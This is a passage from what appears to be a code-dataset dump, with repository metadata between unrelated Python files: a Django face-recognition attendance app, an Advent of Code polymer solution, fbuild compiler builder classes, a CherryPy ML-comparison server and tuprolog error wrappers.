qs.save(update_fields=['present']) if present[person]==True: a=Time(user=user,date=today,time=time, out=False) a.save() def update_attendance_in_db_out(present): today=datetime.date.today() time=datetime.datetime.now() for person in present: user=User.objects.get(username=person) if present[person]==True: a=Time(user=user,date=today,time=time, out=True) a.save() def check_validity_times(times_all): if(len(times_all)>0): sign=times_all.first().out else: sign=True times_in=times_all.filter(out=False) times_out=times_all.filter(out=True) if(len(times_in)!=len(times_out)): sign=True break_hourss=0 if(sign==True): check=False break_hourss=0 return (check,break_hourss) prev=True prev_time=times_all.first().time for obj in times_all: 
curr=obj.out if(curr==prev): check=False break_hourss=0 return (check,break_hourss) if(curr==False): curr_time=obj.time to=curr_time ti=prev_time break_time=((to-ti).total_seconds())/3600 break_hourss+=break_time else: prev_time=obj.time prev=curr return (True,break_hourss) def convert_hours_to_hours_mins(hours): h=int(hours) hours-=h m=hours*60 m=math.ceil(m) return str(str(h)+ " hrs " + str(m) + " mins") #used def hours_vs_date_given_employee(present_qs,time_qs,admin=True): register_matplotlib_converters() df_hours=[] df_break_hours=[] qs=present_qs for obj in qs: date=obj.date times_in=time_qs.filter(date=date).filter(out=False).order_by('time') times_out=time_qs.filter(date=date).filter(out=True).order_by('time') times_all=time_qs.filter(date=date).order_by('time') obj.time_in=None obj.time_out=None obj.hours=0 obj.break_hours=0 if (len(times_in)>0): obj.time_in=times_in.first().time if (len(times_out)>0): obj.time_out=times_out.last().time if(obj.time_in is not None and obj.time_out is not None): ti=obj.time_in to=obj.time_out hours=((to-ti).total_seconds())/3600 obj.hours=hours else: obj.hours=0 (check,break_hourss)= check_validity_times(times_all) if check: obj.break_hours=break_hourss else: obj.break_hours=0 df_hours.append(obj.hours) df_break_hours.append(obj.break_hours) obj.hours=convert_hours_to_hours_mins(obj.hours) obj.break_hours=convert_hours_to_hours_mins(obj.break_hours) df = read_frame(qs) df["hours"]=df_hours df["break_hours"]=df_break_hours print(df) sns.barplot(data=df,x='date',y='hours') plt.xticks(rotation='vertical') rcParams.update({'figure.autolayout': True}) plt.tight_layout() if(admin): plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_date/1.png') plt.close() else: plt.savefig('./recognition/static/recognition/img/attendance_graphs/employee_login/1.png') plt.close() return qs #used def hours_vs_employee_given_date(present_qs,time_qs): register_matplotlib_converters() df_hours=[] df_break_hours=[] df_username=[] qs=present_qs for obj in qs: user=obj.user times_in=time_qs.filter(user=user).filter(out=False) times_out=time_qs.filter(user=user).filter(out=True) times_all=time_qs.filter(user=user) obj.time_in=None obj.time_out=None obj.hours=0 obj.hours=0 if (len(times_in)>0): obj.time_in=times_in.first().time if (len(times_out)>0): obj.time_out=times_out.last().time if(obj.time_in is not None and obj.time_out is not None): ti=obj.time_in to=obj.time_out hours=((to-ti).total_seconds())/3600 obj.hours=hours else: obj.hours=0 (check,break_hourss)= check_validity_times(times_all) if check: obj.break_hours=break_hourss else: obj.break_hours=0 df_hours.append(obj.hours) df_username.append(user.username) df_break_hours.append(obj.break_hours) obj.hours=convert_hours_to_hours_mins(obj.hours) obj.break_hours=convert_hours_to_hours_mins(obj.break_hours) df = read_frame(qs) df['hours']=df_hours df['username']=df_username df["break_hours"]=df_break_hours sns.barplot(data=df,x='username',y='hours') plt.xticks(rotation='vertical') rcParams.update({'figure.autolayout': True}) plt.tight_layout() plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_employee/1.png') plt.close() return qs def total_number_employees(): qs=User.objects.all() return (len(qs) -1) # -1 to account for admin def employees_present_today(): today=datetime.date.today() qs=Present.objects.filter(date=today).filter(present=True) return len(qs) #used def this_week_emp_count_vs_date(): today=datetime.date.today() 
some_day_last_week=today-datetime.timedelta(days=7) monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1)) monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7) qs=Present.objects.filter(date__gte=monday_of_this_week).filter(date__lte=today) str_dates=[] emp_count=[] str_dates_all=[] emp_cnt_all=[] cnt=0 for obj in qs: date=obj.date str_dates.append(str(date)) qs=Present.objects.filter(date=date).filter(present=True) emp_count.append(len(qs)) while(cnt<5): date=str(monday_of_this_week+datetime.timedelta(days=cnt)) cnt+=1 str_dates_all.append(date) if(str_dates.count(date))>0: idx=str_dates.index(date) emp_cnt_all.append(emp_count[idx]) else: emp_cnt_all.append(0) df=pd.DataFrame() df["date"]=str_dates_all df["Number of employees"]=emp_cnt_all sns.lineplot(data=df,x='date',y='Number of employees') plt.savefig('./recognition/static/recognition/img/attendance_graphs/this_week/1.png') plt.close() #used def last_week_emp_count_vs_date(): today=datetime.date.today() some_day_last_week=today-datetime.timedelta(days=7) monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1)) monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7) qs=Present.objects.filter(date__gte=monday_of_last_week).filter(date__lt=monday_of_this_week) str_dates=[] emp_count=[] str_dates_all=[] emp_cnt_all=[] cnt=0 for obj in qs: date=obj.date str_dates.append(str(date)) qs=Present.objects.filter(date=date).filter(present=True) emp_count.append(len(qs)) while(cnt<5): date=str(monday_of_last_week+datetime.timedelta(days=cnt)) cnt+=1 str_dates_all.append(date) if(str_dates.count(date))>0: idx=str_dates.index(date) emp_cnt_all.append(emp_count[idx]) else: emp_cnt_all.append(0) df=pd.DataFrame() df["date"]=str_dates_all df["emp_count"]=emp_cnt_all sns.lineplot(data=df,x='date',y='emp_count') plt.savefig('./recognition/static/recognition/img/attendance_graphs/last_week/1.png') plt.close() # Create your views here. def home(request): return render(request, 'recognition/home.html') @login_required def dashboard(request): if(request.user.username=='admin'): print("admin") return render(request, 'recognition/admin_dashboard.html') else: print("not admin") return render(request,'recognition/employee_dashboard.html') @login_required def add_photos(request): if request.user.username!='admin': return redirect('not-authorised') if request.method=='POST': form=usernameForm(request.POST) data = request.POST.copy() username=data.get('username') if username_present(username): create_dataset(username) messages.success(request, f'Dataset Created') return redirect('add-photos') else: messages.warning(request, f'No such username found. 
Please register employee first.') return redirect('dashboard') else: form=usernameForm() return render(request,'recognition/add_photos.html', {'form' : form}) def mark_your_attendance(request): detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER svc_save_path="face_recognition_data/svc.sav" with open(svc_save_path, 'rb') as f: svc = pickle.load(f) fa = FaceAligner(predictor , desiredFaceWidth = 96) encoder=LabelEncoder() encoder.classes_ = np.load('face_recognition_data/classes.npy') faces_encodings = np.zeros((1,128)) no_of_faces = len(svc.predict_proba(faces_encodings)[0]) count = dict() present = dict() log_time = dict() start = dict() for i in range(no_of_faces): count[encoder.inverse_transform([i])[0]] = 0 present[encoder.inverse_transform([i])[0]] = False vs = VideoStream(src=0).start() sampleNum = 0 while(True): frame = vs.read() frame = imutils.resize(frame ,width = 800) gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) faces = detector(gray_frame,0) for face in faces: print("INFO : inside for loop") (x,y,w,h) = face_utils.rect_to_bb(face) face_aligned = fa.align(frame,gray_frame,face) cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1) (pred,prob)=predict(face_aligned,svc) if(pred!=[-1]): person_name=encoder.inverse_transform(np.ravel([pred]))[0] pred=person_name if count[pred] == 0: start[pred] = time.time() count[pred] = count.get(pred,0) + 1 if count[pred] == 4 and (time.time()-start[pred]) > 1.2: count[pred] = 0 else: #if count[pred] == 4 and (time.time()-start) <= 1.5: present[pred] = True log_time[pred] = datetime.datetime.now() count[pred] = count.get(pred,0) + 1 print(pred, present[pred], count[pred]) cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) else: person_name="unknown" cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) #cv2.putText() # Before continuing to the next loop, I want to give it a little pause # waitKey of 100 millisecond #cv2.waitKey(50) #Showing the image in another window #Creates a window with window name "Face" and with the image img cv2.imshow("Mark Attendance - In - Press q to exit",frame) #Before closing it we need to give a wait command, otherwise the open cv wont work # @params with the millisecond of delay 1 #cv2.waitKey(1) #To get out of the loop key=cv2.waitKey(50) & 0xFF if(key==ord("q")): break #Stoping the videostream vs.stop() # destroying all the windows cv2.destroyAllWindows() update_attendance_in_db_in(present) return redirect('home') def mark_your_attendance_out(request): detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER svc_save_path="face_recognition_data/svc.sav" with open(svc_save_path, 'rb') as f: svc = pickle.load(f) fa = FaceAligner(predictor , desiredFaceWidth = 96) encoder=LabelEncoder() encoder.classes_ = np.load('face_recognition_data/classes.npy') faces_encodings = np.zeros((1,128)) no_of_faces = len(svc.predict_proba(faces_encodings)[0]) count = dict() present = dict() log_time = dict() start = dict() for i in range(no_of_faces): count[encoder.inverse_transform([i])[0]] = 0 present[encoder.inverse_transform([i])[0]] = False vs = VideoStream(src=0).start() sampleNum = 0 while(True): frame = vs.read() frame = 
imutils.resize(frame ,width = 800) gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) faces = detector(gray_frame,0) for face in faces: print("INFO : inside for loop") (x,y,w,h) = face_utils.rect_to_bb(face) face_aligned = fa.align(frame,gray_frame,face) cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1) (pred,prob)=predict(face_aligned,svc) if(pred!=[-1]): person_name=encoder.inverse_transform(np.ravel([pred]))[0] pred=person_name if count[pred] == 0: start[pred] = time.time() count[pred] = count.get(pred,0) + 1 if count[pred] == 4 and (time.time()-start[pred]) > 1.5: count[pred] = 0 else: #if count[pred] == 4 and (time.time()-start) <= 1.5: present[pred] = True log_time[pred] = datetime.datetime.now() count[pred] = count.get(pred,0) + 1 print(pred, present[pred], count[pred]) cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) else: person_name="unknown" cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1) #cv2.putText() # Before continuing to the next loop, I want to give it a little pause # waitKey of 100 millisecond #cv2.waitKey(50) #Showing the image in another window #Creates a window with window name "Face" and with the image img cv2.imshow("Mark Attendance- Out - Press q to exit",frame) #Before closing it we need to give a wait command, otherwise the open cv wont work # @params with the millisecond of delay 1 #cv2.waitKey(1) #To get out of the loop key=cv2.waitKey(50) & 0xFF if(key==ord("q")): break #Stoping the videostream vs.stop() # destroying all the windows cv2.destroyAllWindows() update_attendance_in_db_out(present) return redirect('home') @login_required def train(request): if request.user.username!='admin': return redirect('not-authorised') training_dir='face_recognition_data/training_dataset' count=0 for person_name in os.listdir(training_dir): curr_directory=os.path.join(training_dir,person_name) if not os.path.isdir(curr_directory): continue for imagefile in image_files_in_folder(curr_directory): count+=1 X=[] y=[] i=0 for person_name in os.listdir(training_dir): print(str(person_name)) curr_directory=os.path.join(training_dir,person_name) if not os.path.isdir(curr_directory): continue for imagefile in image_files_in_folder(curr_directory): print(str(imagefile)) image=cv2.imread(imagefile) try: X.append((face_recognition.face_encodings(image)[0]).tolist()) y.append(person_name) i+=1 except: print("removed") os.remove(imagefile) targets=np.array(y) encoder = LabelEncoder() encoder.fit(y) y=encoder.transform(y) X1=np.array(X) print("shape: "+ str(X1.shape)) np.save('face_recognition_data/classes.npy', encoder.classes_) svc = SVC(kernel='linear',probability=True) svc.fit(X1,y) svc_save_path="face_recognition_data/svc.sav" with open(svc_save_path, 'wb') as f: pickle.dump(svc,f) vizualize_Data(X1,targets) messages.success(request, f'Training Complete.') return render(request,"recognition/train.html") @login_required def not_authorised(request): return render(request,'recognition/not_authorised.html') @login_required def view_attendance_home(request): total_num_of_emp=total_number_employees() emp_present_today=employees_present_today() this_week_emp_count_vs_date() last_week_emp_count_vs_date() return render(request,"recognition/view_attendance_home.html", {'total_num_of_emp' : total_num_of_emp, 'emp_present_today': emp_present_today}) @login_required def view_attendance_date(request): if request.user.username!='admin': return redirect('not-authorised') qs=None time_qs=None 
present_qs=None if request.method=='POST': form=DateForm(request.POST) if form.is_valid(): date=form.cleaned_data.get('date') print("date:"+ str(date)) time_qs=Time.objects.filter(date=date) present_qs=Present.objects.filter(date=date) if(len(time_qs)>0 or len(present_qs)>0): qs=hours_vs_employee_given_date(present_qs,time_qs) return render(request,'recognition/view_attendance_date.html', {'form' : form,'qs' : qs }) else: messages.warning(request, f'No records for selected date.') return redirect('view-attendance-date') else: form=DateForm() return render(request,'recognition/view_attendance_date.html', {'form' : form, 'qs' : qs}) @login_required def view_attendance_employee(request): if request.user.username!='admin': return redirect('not-authorised') time_qs=None present_qs=None qs=None if request.method=='POST': form=UsernameAndDateForm(request.POST) if form.is_valid(): username=form.cleaned_data.get('username') if username_present(username): u=User.objects.get(username=username) time_qs=Time.objects.filter(user=u) present_qs=Present.objects.filter(user=u) date_from=form.cleaned_data.get('date_from') date_to=form.cleaned_data.get('date_to') if date_to < date_from: messages.warning(request, f'Invalid date selection.') return redirect('view-attendance-employee') else: time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') if (len(time_qs)>0 or len(present_qs)>0): qs=hours_vs_date_given_employee(present_qs,time_qs,admin=True) return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs}) else: #print("inside qs is None") messages.warning(request, f'No records for selected duration.') return redirect('view-attendance-employee') else: print("invalid username") messages.warning(request, f'No such username found.') return redirect('view-attendance-employee') else: form=UsernameAndDateForm() return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs}) @login_required def view_my_attendance_employee_login(request): if request.user.username=='admin': return redirect('not-authorised') qs=None time_qs=None present_qs=None if request.method=='POST': form=DateForm_2(request.POST) if form.is_valid(): u=request.user time_qs=Time.objects.filter(user=u) present_qs=Present.objects.filter(user=u) date_from=form.cleaned_data.get('date_from') date_to=form.cleaned_data.get('date_to') if date_to < date_from: messages.warning(request, f'Invalid date selection.') return redirect('view-my-attendance-employee-login') else: time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date') if (len(time_qs)>0 or len(present_qs)>0): qs=hours_vs_date_given_employee(present_qs,time_qs,admin=False) return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs}) else: messages.warning(request, f'No records for selected duration.') return redirect('view-my-attendance-employee-login') else: form=DateForm_2() return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs})
24.97619
167
0.722196
0
0
0
0
6,494
0.257944
0
0
6,139
0.243843
bec698afd2c5801e7a05fe6be1339638668af844
856
py
Python
2018/05.py
GillesArcas/Advent_of_Code
1f57eb1686875df2684b0d56916b1d20724e9fb9
[ "MIT" ]
null
null
null
2018/05.py
GillesArcas/Advent_of_Code
1f57eb1686875df2684b0d56916b1d20724e9fb9
[ "MIT" ]
null
null
null
2018/05.py
GillesArcas/Advent_of_Code
1f57eb1686875df2684b0d56916b1d20724e9fb9
[ "MIT" ]
null
null
null
import re import string DATA = '05.txt' def react(polymer): pairs = '|'.join([a + b + '|' + b + a for a, b in zip(string.ascii_lowercase, string.ascii_uppercase)]) length = len(polymer) while 1: polymer = re.sub(pairs, '', polymer) if len(polymer) == length: return(length) else: length = len(polymer) def code1(): with open(DATA) as f: polymer = f.readline().strip() print('1>', react(polymer)) def code2(): with open(DATA) as f: polymer = f.readline().strip() minlength = len(polymer) for c in string.ascii_lowercase: polymer2 = re.sub(c, '', polymer, flags=re.I) length = react(polymer2) if length < minlength: minlength = length print('2>', minlength) code1() code2()
21.948718
108
0.53972
0
0
0
0
0
0
0
0
26
0.030374
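With react() from 05.py above in scope, the puzzle's own worked example confirms the reduction: "dabAcCaCBAcCcaDA" collapses to "dabCBAcaDA", so the returned length is 10.

# Worked example from the Advent of Code 2018 day 5 statement.
assert react("dabAcCaCBAcCcaDA") == 10   # remaining polymer: "dabCBAcaDA"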
bec6becd26fa525cff31dffaad9d3ab5e8f46f15
11,873
py
Python
lib/fbuild/builders/__init__.py
felix-lang/fbuild
9595fbfd6d3ceece31fda2f96c35d4a241f0129b
[ "PSF-2.0", "BSD-2-Clause" ]
40
2015-02-07T00:44:12.000Z
2021-04-02T13:41:08.000Z
lib/fbuild/builders/__init__.py
felix-lang/fbuild
9595fbfd6d3ceece31fda2f96c35d4a241f0129b
[ "PSF-2.0", "BSD-2-Clause" ]
30
2015-02-06T17:45:15.000Z
2019-01-10T16:34:29.000Z
lib/fbuild/builders/__init__.py
felix-lang/fbuild
9595fbfd6d3ceece31fda2f96c35d4a241f0129b
[ "PSF-2.0", "BSD-2-Clause" ]
3
2015-09-03T06:38:02.000Z
2019-10-24T14:26:57.000Z
import abc import contextlib import os import sys from functools import partial from itertools import chain import fbuild import fbuild.db import fbuild.path import fbuild.temp from . import platform # ------------------------------------------------------------------------------ class MissingProgram(fbuild.ConfigFailed): def __init__(self, programs=None): self.programs = programs def __str__(self): if self.programs is None: return 'cannot find program' else: return 'cannot find any of the programs %s' % \ ' '.join(repr(str(p)) for p in self.programs) # ------------------------------------------------------------------------------ @fbuild.db.caches def find_program(ctx, names, paths=None, *, quieter=0): """L{find_program} is a test that searches the paths for one of the programs in I{name}. If one is found, it is returned. If not, the next name in the list is searched for.""" if paths is None: paths = os.environ['PATH'].split(os.pathsep) # If we're running on windows, we need to append '.exe' to the filenames # that we're searching for. if sys.platform == 'win32': new_names = [] for name in names: if \ not name.endswith('.exe') or \ not name.endswith('.cmd') or \ not name.endswith('.bat'): new_names.append(name + '.exe') new_names.append(name + '.cmd') new_names.append(name + '.bat') new_names.append(name) names = new_names for name in names: filename = fbuild.path.Path(name) ctx.logger.check('looking for ' + filename.name, verbose=quieter) if filename.exists() and filename.isfile(): ctx.logger.passed('ok %s' % filename, verbose=quieter) return fbuild.path.Path(name) else: for path in paths: filename = fbuild.path.Path(path, name) if filename.exists() and filename.isfile(): ctx.logger.passed('ok %s' % filename, verbose=quieter) return fbuild.path.Path(filename) ctx.logger.failed(verbose=quieter) raise MissingProgram(names) # ------------------------------------------------------------------------------ def check_version(ctx, builder, version_function, *, requires_version=None, requires_at_least_version=None, requires_at_most_version=None): """Helper function to simplify checking the version of a builder.""" if any(v is not None for v in ( requires_version, requires_at_least_version, requires_at_most_version)): ctx.logger.check('checking %s version' % builder) version_str = version_function() # Convert the version into a tuple version = [] for i in version_str.split('.'): try: version.append(int(i)) except ValueError: # The subversion isn't a number, so just convert it to a # string. 
version.append(i) version = tuple(version) if requires_version is not None and requires_version != version: msg = 'version %s required; found %s' % ( '.'.join(str(i) for i in requires_version), version_str) ctx.logger.failed(msg) raise fbuild.ConfigFailed(msg) if requires_at_least_version is not None and \ requires_at_least_version > version: msg = 'at least version %s required; found %s' % ( '.'.join(str(i) for i in requires_at_least_version), version_str) ctx.logger.failed(msg) raise fbuild.ConfigFailed(msg) if requires_at_most_version is not None and \ requires_at_most_version < version: msg = 'at most version %s required; found %s' % ( '.'.join(str(i) for i in requires_at_most_version), version_str) ctx.logger.failed(msg) raise fbuild.ConfigFailed(msg) ctx.logger.passed(version_str) # ------------------------------------------------------------------------------ class AbstractCompiler(fbuild.db.PersistentObject): def __init__(self, *args, src_suffix, **kwargs): super().__init__(*args, **kwargs) self.src_suffix = src_suffix @fbuild.db.cachemethod def compile(self, src:fbuild.db.SRC, *args, **kwargs) -> fbuild.db.DST: return self.uncached_compile(src, *args, **kwargs) @abc.abstractmethod def uncached_compile(self, src, *args, **kwargs): pass @fbuild.db.cachemethod @platform.auto_platform_options() def build_objects(self, srcs:fbuild.db.SRCS, *args, **kwargs) -> \ fbuild.db.DSTS: """Compile all of the passed in L{srcs} in parallel.""" # When a object has extra external dependencies, such as .c files # depending on .h changes, depending on library changes, we need to add # the dependencies in build_objects. Unfortunately, the db doesn't # know about these new files and so it can't tell when a function # really needs to be rerun. So, we'll just not cache this function. # We need to add extra dependencies to our call. 
objs = [] src_deps = [] dst_deps = [] for o, s, d in self.ctx.scheduler.map( partial(self.compile.call, *args, **kwargs), srcs): objs.append(o) src_deps.extend(s) dst_deps.extend(d) self.ctx.db.add_external_dependencies_to_call( srcs=src_deps, dsts=dst_deps) return objs # -------------------------------------------------------------------------- def tempfile(self, code): return fbuild.temp.tempfile(code, self.src_suffix) @contextlib.contextmanager def tempfile_compile(self, code='', *, quieter=1, **kwargs): with self.tempfile(code) as src: yield self.uncached_compile(src, quieter=quieter, **kwargs) @platform.auto_platform_options() def try_compile(self, *args, **kwargs): try: with self.tempfile_compile(*args, **kwargs): return True except fbuild.ExecutionError: return False @platform.auto_platform_options() def check_compile(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_compile(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False # ------------------------------------------------------------------------------ class AbstractLibLinker(AbstractCompiler): @fbuild.db.cachemethod @platform.auto_platform_options() def link_lib(self, dst, srcs:fbuild.db.SRCS, *args, libs:fbuild.db.SRCS=(), **kwargs) -> fbuild.db.DST: """Link compiled files into a library and caches the results.""" return self.uncached_link_lib(dst, srcs, *args, libs=libs, **kwargs) @abc.abstractmethod def uncached_link_lib(self, *args, **kwargs): pass @platform.auto_platform_options() def build_lib(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}): """Compile all of the passed in L{srcs} in parallel, then link them into a library.""" objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs))) return self.link_lib(dst, objs, libs=libs, **lkwargs) # -------------------------------------------------------------------------- @contextlib.contextmanager @platform.auto_platform_options() def tempfile_link_lib(self, code='', *, quieter=1, ckwargs={}, **kwargs): with self.tempfile(code) as src: dst = src.parent / 'temp' obj = self.uncached_compile(src, quieter=quieter, **ckwargs) yield self.uncached_link_lib(dst, [obj], quieter=quieter, **kwargs) def try_link_lib(self, *args, **kwargs): try: with self.tempfile_link_lib(*args, **kwargs): return True except fbuild.ExecutionError: return False def check_link_lib(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_link_lib(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False # ------------------------------------------------------------------------------ class AbstractRunner(fbuild.db.PersistentObject): @abc.abstractmethod def tempfile_run(self, *args, **kwargs): pass def try_run(self, code='', quieter=1, **kwargs): try: self.tempfile_run(code, quieter=quieter, **kwargs) except fbuild.ExecutionError: return False else: return True def check_run(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_run(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False # ------------------------------------------------------------------------------ class AbstractExeLinker(AbstractCompiler, AbstractRunner): @fbuild.db.cachemethod @platform.auto_platform_options() def link_exe(self, dst, srcs:fbuild.db.SRCS, *args, libs:fbuild.db.SRCS=(), **kwargs) -> fbuild.db.DST: """Link compiled files into an executable.""" return self.uncached_link_exe(dst, srcs, *args, libs=libs, 
**kwargs) @abc.abstractmethod def uncached_link_exe(self, *args, **kwargs): pass @platform.auto_platform_options() def build_exe(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}): """Compile all of the passed in L{srcs} in parallel, then link them into an executable.""" objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs))) return self.link_exe(dst, objs, libs=libs, **lkwargs) # -------------------------------------------------------------------------- @contextlib.contextmanager @platform.auto_platform_options() def tempfile_link_exe(self, code='', *, quieter=1, ckwargs={}, **kwargs): with self.tempfile(code) as src: dst = src.parent / 'temp' obj = self.uncached_compile(src, quieter=quieter, **ckwargs) yield self.uncached_link_exe(dst, [obj], quieter=quieter, **kwargs) @platform.auto_platform_options() def try_link_exe(self, *args, **kwargs): try: with self.tempfile_link_exe(*args, **kwargs): return True except fbuild.ExecutionError: return False @platform.auto_platform_options() def check_link_exe(self, code, msg, *args, **kwargs): self.ctx.logger.check(msg) if self.try_link_exe(code, *args, **kwargs): self.ctx.logger.passed() return True else: self.ctx.logger.failed() return False @platform.auto_platform_options() def tempfile_run(self, *args, quieter=1, ckwargs={}, lkwargs={}, **kwargs): with self.tempfile_link_exe(*args, quieter=quieter, ckwargs=ckwargs, **lkwargs) as exe: return self.ctx.execute([exe], quieter=quieter, cwd=exe.parent, **kwargs) # ------------------------------------------------------------------------------ class AbstractCompilerBuilder(AbstractLibLinker, AbstractExeLinker): pass
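
# A minimal, self-contained sketch of the version-tuple comparison that
# check_version above relies on: a dotted version string becomes a tuple of
# ints (non-numeric parts stay strings) and tuples compare lexicographically.
# The version string '4.2.1' and the bounds are assumed example values.
version_str = '4.2.1'
version = []
for part in version_str.split('.'):
    try:
        version.append(int(part))
    except ValueError:
        version.append(part)
version = tuple(version)
print(version >= (4, 0))  # True  -> passes a requires_at_least_version=(4, 0) check
print(version <= (4, 3))  # True  -> passes a requires_at_most_version=(4, 3) check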
35.762048
80
0.553609
7,575
0.638002
783
0.065948
6,949
0.585278
0
0
2,359
0.198686
bec79a34dea2c5eb7b1cdd952dbf003070a952c4
1,746
py
Python
WebServer.py
i3uex/CompareML
3d53d58117507db11ad08ca0b1c883ec0997840e
[ "MIT" ]
null
null
null
WebServer.py
i3uex/CompareML
3d53d58117507db11ad08ca0b1c883ec0997840e
[ "MIT" ]
null
null
null
WebServer.py
i3uex/CompareML
3d53d58117507db11ad08ca0b1c883ec0997840e
[ "MIT" ]
null
null
null
import json import cherrypy import engine class WebServer(object): @cherrypy.expose def index(self): return open('public/index.html', encoding='utf-8') @cherrypy.expose class GetOptionsService(object): @cherrypy.tools.accept(media='text/plain') def GET(self): return json.dumps({ 'providers': engine.get_providers(), 'algorithms': engine.get_algorithms(), 'default_datasets': engine.get_all_default_datasets() }) @cherrypy.expose class SetOptionsService(object): @cherrypy.tools.accept(media='text/plain') def POST(self, options): """ Use the options selected by the user to execute all algorithms :param options: { is_default_dataset: bool, dataset: str, providers: [] algorithms: [] target: str } if is_default_dataset is true, dataset will contain the name of the default_dataset""" options_dic = json.loads(options) try: result = engine.execute(options_dic['is_default_dataset'], options_dic['dataset'], options_dic['providers'], options_dic['algorithms'], options_dic['target']) except Exception as exception: message = f"{str(exception)}" raise cherrypy.HTTPError(500, message=message) return result @cherrypy.expose @cherrypy.tools.json_out() class GetDefaultDatasetHeadersService(object): @cherrypy.tools.accept(media='text/plain') def GET(self, default_dataset_name): return {'headers': engine.get_default_dataset_headers(default_dataset_name)}
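
# A sketch of the payload SetOptionsService.POST expects, built from the keys
# its docstring lists. The dataset, provider, algorithm and target names are
# assumed placeholders, not values the service necessarily knows about.
import json

options = json.dumps({
    'is_default_dataset': True,
    'dataset': 'iris',               # placeholder default-dataset name
    'providers': ['provider_a'],     # placeholder provider identifier
    'algorithms': ['algorithm_x'],   # placeholder algorithm identifier
    'target': 'species',             # placeholder target column
})
# A client would submit this string as the 'options' field of the POST request.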
30.103448
120
0.611684
1,613
0.923826
0
0
1,662
0.95189
0
0
576
0.329897
bec81857d7e4af0801337540f4b978497c5536f9
1,897
py
Python
tuprolog/solve/exception/error/existence/__init__.py
DavideEva/2ppy
55609415102f8116165a42c8e33e029c4906e160
[ "Apache-2.0" ]
1
2021-08-07T06:29:28.000Z
2021-08-07T06:29:28.000Z
tuprolog/solve/exception/error/existence/__init__.py
DavideEva/2ppy
55609415102f8116165a42c8e33e029c4906e160
[ "Apache-2.0" ]
14
2021-09-16T13:25:12.000Z
2022-01-03T10:12:22.000Z
tuprolog/solve/exception/error/existence/__init__.py
DavideEva/2ppy
55609415102f8116165a42c8e33e029c4906e160
[ "Apache-2.0" ]
1
2021-12-22T00:25:32.000Z
2021-12-22T00:25:32.000Z
from typing import Union from tuprolog import logger # noinspection PyUnresolvedReferences import jpype.imports # noinspection PyUnresolvedReferences import it.unibo.tuprolog.solve.exception.error as errors from tuprolog.core import Term, Atom from tuprolog.solve import ExecutionContext, Signature ExistenceError = errors.ExistenceError ObjectType = ExistenceError.ObjectType OBJECT_PROCEDURE = ObjectType.PROCEDURE OBJECT_SOURCE_SINK = ObjectType.SOURCE_SINK OBJECT_RESOURCE = ObjectType.RESOURCE OBJECT_STREAM = ObjectType.STREAM OBJECT_OOP_ALIAS = ObjectType.OOP_ALIAS OBJECT_OOP_METHOD = ObjectType.OOP_METHOD OBJECT_OOP_CONSTRUCTOR = ObjectType.OOP_CONSTRUCTOR OBJECT_OOP_PROPERTY = ObjectType.OOP_PROPERTY def existence_error( context: ExecutionContext, type: ObjectType, culprit: Term, message: str ) -> ExistenceError: return ExistenceError.of(context, type, culprit, message) def existence_error_for_source_sink( context: ExecutionContext, alias: Union[Atom, str] ) -> ExistenceError: return ExistenceError.forSourceSink(context, alias) def existence_error_for_procedure( context: ExecutionContext, procedure: Signature ) -> ExistenceError: return ExistenceError.forProcedure(context, procedure) def existence_error_for_stream( context: ExecutionContext, stream: Term ) -> ExistenceError: return ExistenceError.forStream(context, stream) def existence_error_for_resource( context: ExecutionContext, name: str ) -> ExistenceError: return ExistenceError.forResource(context, name) def object_type(name: Union[str, Term]) -> ObjectType: if isinstance(name, str): return ObjectType.of(name) else: return ObjectType.fromTerm(name) logger.debug("Loaded JVM classes from it.unibo.tuprolog.solve.exception.error.ExistenceError.*")
24.960526
96
0.765946
0
0
0
0
0
0
0
0
156
0.082235
bec831a08a3c7355e5ebc6786562ec7da94bccbd
2,421
py
Python
cptk/core/fetcher.py
RealA10N/cptk
